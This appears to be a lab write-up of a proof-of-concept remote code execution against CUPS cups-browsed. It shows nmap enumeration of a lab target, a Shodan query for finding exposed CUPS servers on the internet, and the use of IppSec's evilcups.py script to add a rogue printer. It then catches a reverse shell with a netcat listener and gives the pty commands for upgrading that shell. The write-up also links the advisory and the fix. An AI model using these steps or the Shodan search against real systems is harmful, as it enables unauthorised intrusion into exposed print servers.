Intro
CUPS is a modular printing system for Unix-like computer operating systems which allows a computer to act as a print server. This vulnerability was discovered by Evilsocket (Simone Margaritelli).
https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
PoC: RCE
Let’s assume our target host is 10.10.11.40. We can conduct enumeration using Nmap with the following command:
Sudo nmap -sC -sV -vv -oA nmap/evilcups 10.10.11.40
This command utilizes the default Nmap scripts for service detection and increased verbosity. The -oA nmap/evilcups option directs Nmap to save the scan results in a file named "nmap/evilcups".
The scan reveals a Debian machine with port 22 open, along with the Internet Printing Protocol (IPP) listening on port 631, indicating it is running CUPS 2.4. A web server is hosted on this interface, displaying the title "Home – CUPS 2.4.2." We can access it at http://10.10.11.40 in our browsers.
As we can see, the default CUPS management interface is exposed.
[!] Note that it is effortless to search for instances where this interface is exposed on the open web. This can be done by heading to Shodan and searching:
port:631 "CUPS"
Using an IP address from the results in Shodan, such as x.x.x.x:631, we can successfully bring up the CUPS management interface for these targets.
Let's pivot back to our PoC for now. Currently, we are accessing this instance as an “anonymous user.” While we lack administrative privileges, we can still view the printers.
Actions that we can conduct from here include viewing the jobs associated with this printer and printing a test page. Note that we cannot delete or modify printers at this time, as we are not an administrator.
The next step is to run the command:
sudo nmap -sU -p 631,632 10.10.11.40
This command instructs nmap to perform a UDP scan on the target host. It is specifically checking ports 631 and 632. Here is the result:
Note that Evilsocket has detailed the main CVEs associated with this vulnerability here.
Also, we can view the reported vulnerability on GitHub.
Another version of this code has been made available to us by IppSec:
https://github.com/ippsec/evil-cups
IppSec has made a few improvements to this POC, and as such, I will be talking about this script. It can be run with:
python evilcups.py [my host IP] [target host IP]
Let’s dig into that script a bit:
This function is responsible for sending our UDP packet to our target host. In this script we are sending up our specified attributes.
An interesting part of this script is:
This line begins with a single quote. This results in a blank variable being inserted during our request. To get a better understanding of our packet we can visit Apple.com
After “evilcups.py” is executed, when we refresh the CUPS interface from earlier (http://10.10.11.40), we can see that we have added a new printer under the name we specified ("HACKED"):
A reverse shell can be crafted with: nc -lvnp 9001. Here we use netcat to listen over port 9001. Next, click into this newly added printer and print a test page. By doing this we utilize the “FoomaticRIPCommandLine” section of IppSecs code, consequently spawning a shell.
Upgrading the shell is done with:
python -c 'import pty;pty.spawn("/bin/bash")'
Note that this command creates a bash shell session where a standard shell might not be available, e.g. a remote access session like this one.
After that, we can execute the command:
stty raw-echo;fg
This command sets the terminal to 'raw' mode and brings the background job to the foreground. Subsequently, a reverse shell as the "lp" user is established at this point.
The "Fix"
We can head to the cups-browsed Git repo and see the change brought in as a result of this vulnerability.
https://github.com/OpenPrinting/cups-browsed/commit/1debe6b140c37e0aa928559add4abcc95ce54aa2
Closing
Something I found interesting was how turbulent the reporting process was for Evilsocket. They go into more detail about it in their block but essentially, this issue was quite difficult to report despite being so dangerous. Furthermore, he explains that his initial report if this finding was leaked!
Thank You
I want to thank you for reading this article, IppSec for the wonderful documentation, and Evilsocket (Simone Margaritelli) for sharing their findings surrounding this vulnerability!
https://www.evilsocket.net/
https://www.linkedin.com/in/ippsec/